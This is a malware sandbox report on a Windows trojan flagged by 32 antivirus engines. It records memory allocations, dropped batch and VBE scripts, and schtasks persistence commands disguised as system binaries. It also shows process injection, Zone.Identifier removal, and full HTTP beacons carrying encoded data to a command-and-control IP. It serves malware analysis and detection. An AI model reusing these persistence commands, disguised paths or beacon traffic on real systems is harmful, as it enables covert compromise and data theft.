NtAllocateVirtualMemory June 12, 2021, 6:22 p.m.	process_identifier: 8620 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory June 12, 2021, 6:22 p.m.	process_identifier: 8620 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff20000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory June 12, 2021, 6:22 p.m.	process_identifier: 8620 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff00000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory June 12, 2021, 6:22 p.m.	process_identifier: 8620 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff00000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory June 12, 2021, 6:22 p.m.	process_identifier: 8620 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92c7a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory June 12, 2021, 6:22 p.m.	process_identifier: 8620 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92c8c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory June 12, 2021, 6:22 p.m.	process_identifier: 8620 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92db0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory June 12, 2021, 6:22 p.m.	process_identifier: 8620 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92d2c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory June 12, 2021, 6:22 p.m.	process_identifier: 8620 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92d56000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory June 12, 2021, 6:22 p.m.	process_identifier: 8620 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92d30000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory June 12, 2021, 6:22 p.m.	process_identifier: 8620 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92c7b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory June 12, 2021, 6:22 p.m.	process_identifier: 8620 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92c9b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory June 12, 2021, 6:22 p.m.	process_identifier: 8620 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92ccc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory June 12, 2021, 6:22 p.m.	process_identifier: 8620 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92c9d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory June 12, 2021, 6:22 p.m.	process_identifier: 8620 region_size: 32768 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92db1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory June 12, 2021, 6:22 p.m.	process_identifier: 8620 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92c72000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory June 12, 2021, 6:22 p.m.	process_identifier: 8620 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92db9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory June 12, 2021, 6:22 p.m.	process_identifier: 8620 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92c8d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory June 12, 2021, 6:22 p.m.	process_identifier: 8620 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92dba000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory June 12, 2021, 6:22 p.m.	process_identifier: 8620 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92dbb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory June 12, 2021, 6:22 p.m.	process_identifier: 8620 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92c8e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory June 12, 2021, 6:22 p.m.	process_identifier: 8620 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92dbc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory June 12, 2021, 6:22 p.m.	process_identifier: 8620 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92c8a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory June 12, 2021, 6:22 p.m.	process_identifier: 8620 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92e00000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory June 12, 2021, 6:22 p.m.	process_identifier: 8620 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92dbd000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1

Looks up the external IP address (1 event)

domain

ipinfo.io

Creates executable files on the filesystem (4 events)

file	C:\FontWinintohostNet\u8hVPpfkR4YIk505GPamOvaaPm.bat
file	C:\FontWinintohostNet\FontWinintohostNetrefperfsvc.exe
file	C:\FontWinintohostNet\UWE3BhTNVatEksTFn0CppPafAWK.vbe
file	C:\FontWinintohostNet\XB2Ym8KU2J.bat

Creates a suspicious process (10 events)

cmdline	"schtasks" /create /tn "pw" /sc ONLOGON /tr "'C:\Python27\README\pw.exe'" /rl HIGHEST /f
cmdline	"schtasks" /create /tn "taskhost" /sc ONLOGON /tr "'C:\Windows\System32\NlsLexicons0026\taskhost.exe'" /rl HIGHEST /f
cmdline	"schtasks" /create /tn "smss" /sc ONLOGON /tr "'C:\Documents and Settings\smss.exe'" /rl HIGHEST /f
cmdline	"schtasks" /create /tn "SearchFilterHost" /sc ONLOGON /tr "'C:\Windows\System32\AxInstSv\SearchFilterHost.exe'" /rl HIGHEST /f
cmdline	"schtasks" /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Recovery\ab7d780a-0706-11e8-9512-b992fd7a33be\WmiPrvSE.exe'" /rl HIGHEST /f
cmdline	"schtasks" /create /tn "SearchIndexer" /sc ONLOGON /tr "'C:\Documents and Settings\SearchIndexer.exe'" /rl HIGHEST /f
cmdline	"C:\Windows\System32\cmd.exe" /C "C:\FontWinintohostNet\XB2Ym8KU2J.bat"
cmdline	"schtasks" /create /tn "pw" /sc ONLOGON /tr "'C:\Python27\LICENSE\pw.exe'" /rl HIGHEST /f
cmdline	"schtasks" /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Users\Default User\sppsvc.exe'" /rl HIGHEST /f
cmdline	"schtasks" /create /tn "srvany" /sc ONLOGON /tr "'C:\Windows\SysWOW64\mf3216\srvany.exe'" /rl HIGHEST /f

Drops a binary and executes it (3 events)

file	C:\FontWinintohostNet\UWE3BhTNVatEksTFn0CppPafAWK.vbe
file	C:\FontWinintohostNet\FontWinintohostNetrefperfsvc.exe
file	C:\FontWinintohostNet\XB2Ym8KU2J.bat

A process created a hidden window (11 events)

Time & API	Arguments	Status	Return
ShellExecuteExW June 12, 2021, 6:22 p.m.	show_type: 0 filepath_r: C:/FontWinintohostNet/u8hVPpfkR4YIk505GPamOvaaPm.bat parameters: filepath: C:/FontWinintohostNet/u8hVPpfkR4YIk505GPamOvaaPm.bat	1	1
CreateProcessInternalW June 12, 2021, 6:22 p.m.	thread_identifier: 4368 thread_handle: 0x0000000000000360 process_identifier: 5752 current_directory: C:\FontWinintohostNet filepath: track: 1 command_line: "schtasks" /create /tn "SearchFilterHost" /sc ONLOGON /tr "'C:\Windows\System32\AxInstSv\SearchFilterHost.exe'" /rl HIGHEST /f filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x0000000000000368	1	1
CreateProcessInternalW June 12, 2021, 6:22 p.m.	thread_identifier: 4608 thread_handle: 0x0000000000000360 process_identifier: 5260 current_directory: C:\FontWinintohostNet filepath: track: 1 command_line: "schtasks" /create /tn "SearchIndexer" /sc ONLOGON /tr "'C:\Documents and Settings\SearchIndexer.exe'" /rl HIGHEST /f filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x000000000000036c	1	1
CreateProcessInternalW June 12, 2021, 6:22 p.m.	thread_identifier: 2060 thread_handle: 0x0000000000000360 process_identifier: 6844 current_directory: C:\FontWinintohostNet filepath: track: 1 command_line: "schtasks" /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Recovery\ab7d780a-0706-11e8-9512-b992fd7a33be\WmiPrvSE.exe'" /rl HIGHEST /f filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x000000000000037c	1	1
CreateProcessInternalW June 12, 2021, 6:22 p.m.	thread_identifier: 3180 thread_handle: 0x0000000000000388 process_identifier: 8628 current_directory: C:\FontWinintohostNet filepath: track: 1 command_line: "schtasks" /create /tn "pw" /sc ONLOGON /tr "'C:\Python27\README\pw.exe'" /rl HIGHEST /f filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x000000000000038c	1	1
CreateProcessInternalW June 12, 2021, 6:22 p.m.	thread_identifier: 8248 thread_handle: 0x0000000000000388 process_identifier: 7672 current_directory: C:\FontWinintohostNet filepath: track: 1 command_line: "schtasks" /create /tn "pw" /sc ONLOGON /tr "'C:\Python27\LICENSE\pw.exe'" /rl HIGHEST /f filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x0000000000000390	1	1
CreateProcessInternalW June 12, 2021, 6:22 p.m.	thread_identifier: 3080 thread_handle: 0x000000000000039c process_identifier: 4104 current_directory: C:\FontWinintohostNet filepath: track: 1 command_line: "schtasks" /create /tn "taskhost" /sc ONLOGON /tr "'C:\Windows\System32\NlsLexicons0026\taskhost.exe'" /rl HIGHEST /f filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x00000000000003a0	1	1
CreateProcessInternalW June 12, 2021, 6:22 p.m.	thread_identifier: 2424 thread_handle: 0x00000000000003a8 process_identifier: 7000 current_directory: C:\FontWinintohostNet filepath: track: 1 command_line: "schtasks" /create /tn "srvany" /sc ONLOGON /tr "'C:\Windows\SysWOW64\mf3216\srvany.exe'" /rl HIGHEST /f filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x00000000000003b0	1	1
CreateProcessInternalW June 12, 2021, 6:22 p.m.	thread_identifier: 6688 thread_handle: 0x00000000000003a8 process_identifier: 6652 current_directory: C:\FontWinintohostNet filepath: track: 1 command_line: "schtasks" /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Users\Default User\sppsvc.exe'" /rl HIGHEST /f filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x00000000000002ec	1	1
CreateProcessInternalW June 12, 2021, 6:22 p.m.	thread_identifier: 8888 thread_handle: 0x00000000000003a8 process_identifier: 4804 current_directory: C:\FontWinintohostNet filepath: track: 1 command_line: "schtasks" /create /tn "smss" /sc ONLOGON /tr "'C:\Documents and Settings\smss.exe'" /rl HIGHEST /f filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x00000000000002f4	1	1
ShellExecuteExW June 12, 2021, 6:22 p.m.	show_type: 0 filepath_r: C:\FontWinintohostNet\XB2Ym8KU2J.bat parameters: filepath: C:\FontWinintohostNet\XB2Ym8KU2J.bat	1	1

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses June 12, 2021, 6:22 p.m.	flags: 15 family: 0		111	0

Checks for the Locally Unique Identifier on the system for a suspicious privilege (2 events)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW June 12, 2021, 6:22 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0
LookupPrivilegeValueW June 12, 2021, 6:22 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Yara rule detected in process memory (39 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	Communication using DGA	rule	Network_DGA
description	Communications use DNS	rule	Network_DNS
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Create a windows service	rule	Create_Service
description	Record Audio	rule	Sniff_Audio
description	Communications over HTTP	rule	Network_HTTP
description	Escalate priviledges	rule	Escalate_priviledges
description	Run a KeyLogger	rule	KeyLogger
description	Communications over FTP	rule	Network_FTP
description	Win.Trojan.agentTesla	rule	Win_Trojan_agentTesla_Zero
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	Steal credential	rule	local_credential_Steal
description	Take ScreenShot	rule	ScreenShot
description	File Downloader	rule	Network_Downloader
description	Communications over P2P network	rule	Network_P2P_Win
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerCheck__RemoteAPI
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__ConsoleCtrl
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	(no description)	rule	Check_Dlls
description	Checks if being debugged	rule	anti_dbg
description	Anti-Sandbox checks for ThreatExpert	rule	antisb_threatExpert
description	Bypass DEP	rule	disable_dep
description	Affect hook table	rule	win_hook

Uses Windows utilities for basic Windows functionality (11 events)

cmdline	"schtasks" /create /tn "pw" /sc ONLOGON /tr "'C:\Python27\README\pw.exe'" /rl HIGHEST /f
cmdline	"schtasks" /create /tn "taskhost" /sc ONLOGON /tr "'C:\Windows\System32\NlsLexicons0026\taskhost.exe'" /rl HIGHEST /f
cmdline	chcp 65001
cmdline	"schtasks" /create /tn "smss" /sc ONLOGON /tr "'C:\Documents and Settings\smss.exe'" /rl HIGHEST /f
cmdline	"schtasks" /create /tn "SearchFilterHost" /sc ONLOGON /tr "'C:\Windows\System32\AxInstSv\SearchFilterHost.exe'" /rl HIGHEST /f
cmdline	"schtasks" /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Recovery\ab7d780a-0706-11e8-9512-b992fd7a33be\WmiPrvSE.exe'" /rl HIGHEST /f
cmdline	"schtasks" /create /tn "SearchIndexer" /sc ONLOGON /tr "'C:\Documents and Settings\SearchIndexer.exe'" /rl HIGHEST /f
cmdline	"schtasks" /create /tn "pw" /sc ONLOGON /tr "'C:\Python27\LICENSE\pw.exe'" /rl HIGHEST /f
cmdline	ping -n 5 localhost
cmdline	"schtasks" /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Users\Default User\sppsvc.exe'" /rl HIGHEST /f
cmdline	"schtasks" /create /tn "srvany" /sc ONLOGON /tr "'C:\Windows\SysWOW64\mf3216\srvany.exe'" /rl HIGHEST /f

Communicates with host for which no DNS query was performed (2 events)

host	172.217.25.14
host	82.146.43.69

Installs itself for autorun at Windows startup (9 events)

cmdline	"schtasks" /create /tn "pw" /sc ONLOGON /tr "'C:\Python27\README\pw.exe'" /rl HIGHEST /f
cmdline	"schtasks" /create /tn "taskhost" /sc ONLOGON /tr "'C:\Windows\System32\NlsLexicons0026\taskhost.exe'" /rl HIGHEST /f
cmdline	"schtasks" /create /tn "smss" /sc ONLOGON /tr "'C:\Documents and Settings\smss.exe'" /rl HIGHEST /f
cmdline	"schtasks" /create /tn "SearchFilterHost" /sc ONLOGON /tr "'C:\Windows\System32\AxInstSv\SearchFilterHost.exe'" /rl HIGHEST /f
cmdline	"schtasks" /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Recovery\ab7d780a-0706-11e8-9512-b992fd7a33be\WmiPrvSE.exe'" /rl HIGHEST /f
cmdline	"schtasks" /create /tn "SearchIndexer" /sc ONLOGON /tr "'C:\Documents and Settings\SearchIndexer.exe'" /rl HIGHEST /f
cmdline	"schtasks" /create /tn "pw" /sc ONLOGON /tr "'C:\Python27\LICENSE\pw.exe'" /rl HIGHEST /f
cmdline	"schtasks" /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Users\Default User\sppsvc.exe'" /rl HIGHEST /f
cmdline	"schtasks" /create /tn "srvany" /sc ONLOGON /tr "'C:\Windows\SysWOW64\mf3216\srvany.exe'" /rl HIGHEST /f

Network communications indicative of possible code injection originated from the process smss.exe (5 events)

Time & API	Arguments	Status	Return
send June 12, 2021, 6:22 p.m.	buffer: GET /externalpython_Processorgame.php?LvrQDfqaLdLHF9eQd39S=HlNgKSQ&024460c38d1a807278c8431ced0b0904=4b7440ed015fe8fe3058245b94b19e91&fc3c3634ae1d8921db8402bb95b1565b=wY3AzM2ITM5YWNmljN3UDO4YDN5gjYjljMhZTO3M2YmZTOilTY2cjN&LvrQDfqaLdLHF9eQd39S=HlNgKSQ HTTP/1.1 Accept: / Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36 Host: 82.146.43.69 Connection: Keep-Alive socket: 1168 sent: 474	1	474
send June 12, 2021, 6:22 p.m.	buffer: `Ä\|ðÖ´=¤Ì+E¾¦v ¡÷?¦ºû¯òà*</=5 À'ÀÀÀ+À#À,À$À À @2j8;ÿ ipinfo.io socket: 1328 sent: 151	1	151
send June 12, 2021, 6:22 p.m.	buffer: FBAd£¦5ªîw_ 7{ÜçaS"Áohöe{Êì>¿swy~~ï1¦D7á¨ó±¢6yr:KOë@¸J¹,ð9)5)é8Â®3îùÿ²×çóÛâÏ½L¨ëqRÉ¼0ü*÷f?N¢Áº_Û Z74Í¸3"¿ socket: 1328 sent: 150	1	150
send June 12, 2021, 6:23 p.m.	buffer: à9vÑÒ9ò¿¢E¿î ¸¼)î\|æ©ì.>¼ék!HOê,ÿÞ§Ya\|¯g Wó'\ÕYm0ÛXrYÕ3=bdÙYw¨9J>ì£¥²~;ÐÙ\ú ½v¡ Óúté¨àðÊc3¶ÎªîÍñwWn(H\|³¶ôK¾¢ ¾ìko½¾üGH{@{@zHÂÇ¬×>±Ð6iÑoÎÑùGÁ¥,·îà¨*©q¬M¾?bmKéã©0ÃÄm2HD<Ö socket: 1328 sent: 229	1	229
send June 12, 2021, 6:23 p.m.	buffer: GET /externalpython_Processorgame.php?LvrQDfqaLdLHF9eQd39S=HlNgKSQ&bb3ddb2219372e793395286708ab7007=gM4UWNmFGZwgjN2AjNyQWMwQmZyITOzkzNxEDN2QzYiZDZ5ADOkhDZyEDNykjM1ITOzQDNyczM&fc3c3634ae1d8921db8402bb95b1565b=ANxYmZ0ETN3QzNhZ2MzQWZkRjM2UGOzU2N5I2YyEDZmNjZ0YjZ1kDZ&cd8054709f69449745e1d9b91abbd92e=d1nIjFGNihzNmRzYzQjY4YTYwIzN1UDNwIWZlJ2MkVjNzUWZ3QTZ3QzMmJiOiI2NjZDZ4QWZxMTM1MWMxEmY4YjMhVTY5U2M5MjMiN2NiwiI0AzMmVGMwQzYwEmM5QWN3MWO4QGNkJGZ5QzMzQTMwM2YlBDN0MTM2IiOiIzNxEzN5QGOzMzM5YTZ3gDNzEzMmlzN3gTZ3gDZ2IDOis3W&c7b940f6c4fda35f1571cd148ec3856b=d1nIiojI1UjYkljZidzMlZjYwYWNzUDO3YzYwIjYyITNmJ2N5EmIsIyYhRjY4cjZ0M2M0IGO2EGMycTN1QDMiVWZiNDZ1YzMlV2N0U2N0MjZiojIidzY2QGOkVWMzETNjFTMhJGO2ITY1EWOlNTOzIjYjdjIsICNwMjZlBDM0MGMhJTOkVzNjlDOkRDZiRWO0MzM0EDMjNWZwQDNzEjNiojIycTMxcTOkhzMzMTO2U2N4QzMxMjZ5czN4U2N4QmNygjI7xSfikjSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJN1Vp9maJVHbXJ2aGBzYwp0QMlGNrlkNJNlYo5UbZxGZxMGcKNETptGbJZTSTpVd5cUY3lTbjpGbXRles1WSzlUaJZTS5JlQSxWSzl0QkBnSFlEMZRUSPRXRJNnRtJmdsJzY6ZVbaZnSIV1ZjRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5o0QhBjVYllb1cVY65EWhRXODhlds1GT2pVbiBnQYFmd3FDTjBnejdnUIR2bKl2TpV1VitmRXpVeKNETpd3VkZnVyUld3ZVWw5EWRl2bqlEb1IjY2Y1ViBnUul0cJlmT0UkeNdXSp9Ua3dVWw40MidnSDxUawIjYqZ1RixmUGlEaW12Y2RXRJJTW65EMNZVUp9maJ5mSzIWa3lWSwcmeOVDNp5UeFRET3llaOFDN55keJl2Tp1kMiNnSDxUaJFzUp9maJVjSIRWdWNjYqp0QMl2dXRmdWJTVp9maJVXOXFmbW12YpdXaJNnVzIGbOxWS2k0UlBDbykVa3lWS3VFVNVXU61Ee0M0T3lkaMFzYU1UavpWS3xWbJdDcqlkda1mYKJEWTl2dplUeJREZ6Z1Rkl2bqlEbxcVWPpEWapnVsl0cJlXURFTaNlXUxUlRSxWS2k0UaRnRtRFRCxWSzl0QNVXSqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiUTNiRWOmJ2NzUmNiBjZ1MTN4cjNjBjMiJjM1YmY3kTYiwiIhdDM1E2M5ITOmN2YxQTZzQjZ5U2MzYjZwUTNzU2NlBTYjNTM2MGNzIiOiI2NjZDZ4QWZxMTM1MWMxEmY4YjMhVTY5U2M5MjMiN2NiwiI0AzMmVGMwQzYwEmM5QWN3MWO4QGNkJGZ5QzMzQTMwM2YlBDN0MTM2IiOiIzNxEzN5QGOzMzM5YTZ3gDNzEzMmlzN3gTZ3gDZ2IDOis3W HTTP/1.1 Accept: / Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36 Host: 82.146.43.69 socket: 1168 sent: 2035	1	2035

Attempts to create or modify system certificates (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob

One or more non-whitelisted processes were created (2 events)

parent_process	wscript.exe				martian_process	C:/FontWinintohostNet/u8hVPpfkR4YIk505GPamOvaaPm.bat
parent_process	wscript.exe				martian_process	"C:\FontWinintohostNet\u8hVPpfkR4YIk505GPamOvaaPm.bat"

Attempts to remove evidence of file being downloaded from the Internet (9 events)

file	C:\Documents and Settings\SearchIndexer.exe:Zone.Identifier
file	C:\Users\Default User\sppsvc.exe:Zone.Identifier
file	C:\Python27\README\pw.exe:Zone.Identifier
file	C:\Documents and Settings\smss.exe:Zone.Identifier
file	C:\Python27\LICENSE\pw.exe:Zone.Identifier
file	C:\Recovery\ab7d780a-0706-11e8-9512-b992fd7a33be\WmiPrvSE.exe:Zone.Identifier
file	C:\Windows\System32\AxInstSv\SearchFilterHost.exe:Zone.Identifier
file	C:\Windows\System32\NlsLexicons0026\taskhost.exe:Zone.Identifier
file	C:\Windows\SysWOW64\mf3216\srvany.exe:Zone.Identifier

Resumed a suspended thread in a remote process potentially indicative of process injection (4 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 7092 resumed a thread in remote process 8564
Process injection	Process 9016 resumed a thread in remote process 9148
NtResumeThread June 12, 2021, 6:22 p.m.	thread_handle: 0x00000270 suspend_count: 1 process_identifier: 8564	1	0	0
NtResumeThread June 12, 2021, 6:22 p.m.	thread_handle: 0x0000000000000068 suspend_count: 0 process_identifier: 9148	1	0	0

The process wscript.exe wrote an executable file to disk (1 event)

file	C:\Windows\SysWOW64\wscript.exe

Connects to an IP address that is no longer responding to requests (legitimate services will remain up-and-running usually) (1 event)

dead_host

192.168.56.102:49863

File has been identified by 32 AntiVirus engines on VirusTotal as malicious (32 events)

Elastic	malicious (high confidence)
DrWeb	BackDoor.QuasarNET.5
MicroWorld-eScan	Trojan.Uztuby.17
FireEye	Trojan.Uztuby.17
McAfee	GenericRXJH-DC!8A2AF8EF221C
Zillya	Trojan.ScriptKD.JS.10
Cybereason	malicious.857330
Arcabit	Trojan.Uztuby.17
BitDefenderTheta	Gen:NN.ZemsilF.34738.Rq0@a0C73ihi
Cyren	W32/MSIL_Kryptik.EEI.gen!Eldorado
ESET-NOD32	a variant of MSIL/Spy.Agent.CVT
APEX	Malicious
Avast	Win32:RATX-gen [Trj]
ClamAV	Win.Malware.Uztuby-9848412-0
Kaspersky	HEUR:Backdoor.MSIL.LightStone.gen
BitDefender	Trojan.Uztuby.17
Ad-Aware	Trojan.MSIL.Basic.8.Gen
Emsisoft	Trojan.Uztuby.17 (B)
VIPRE	Trojan.Win32.Generic!BT
McAfee-GW-Edition	BehavesLike.Win32.Generic.dh
Sophos	Mal/SpyNoon-A
SentinelOne	Static AI - Malicious SFX
eGambit	Unsafe.AI_Score_99%
MAX	malware (ai score=86)
Microsoft	Trojan:MSIL/SpyNoon.RTU!MTB
GData	Win32.Trojan.BSE.1CL7UZW
Cynet	Malicious (score: 100)
ALYac	Trojan.MSIL.Basic.8.Gen
Malwarebytes	Malware.AI.1519748889
Ikarus	Trojan.MSIL.Spy
Fortinet	MSIL/Agent.CVT!tr
AVG	Win32:RATX-gen [Trj]

12.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All